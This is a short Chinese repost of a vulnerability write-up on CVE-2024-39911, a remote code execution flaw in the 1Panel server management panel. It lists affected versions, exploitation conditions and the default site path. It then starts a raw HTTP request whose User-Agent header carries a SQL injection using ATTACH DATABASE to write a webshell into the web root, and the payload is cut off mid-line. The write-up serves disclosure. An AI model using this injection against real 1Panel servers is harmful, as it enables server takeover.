1Panel面板最新前台RCE漏洞(CVE-2024-39911)
1Panel 是新一代的 Linux 服务器运维管理面板,用户可以通过 Web 图形界面轻松管理 Linux 服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。且深度集成开源建站软件 WordPress 和 Halo.0x1 测试版本专业版 v1.10.10-lts 社区版 v1.10.10-lts 1panel/openresty:1.21.4.3-3-1-focal0x2 影响范围网站监控功能影响 == 1panel/openresty:1.21.4.3-3-1-focal WAF功能影响 = 1panel/openresty:1.21.4.3-3-1-focal0x3 题外话具体测试/发现过程在https://blog.mo60.cn/index.php/archives/1Panel_SQLinjection2Rce.html有兴趣的大佬们可以看看0x4 网站监控功能GetShell利用条件:专业版,并开启网站监控功能关闭waf功能安装有1P-openresty容器且搭建有php环境网站默认网站路径格式如下,这个路径是在op容器里面的路径/www/sites/网站代号(默认为域名)/index/通过sql注入导出文件到网站路径下GET / HTTP/1.1 Host: 192.168.99.6 User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/s
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2439335.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!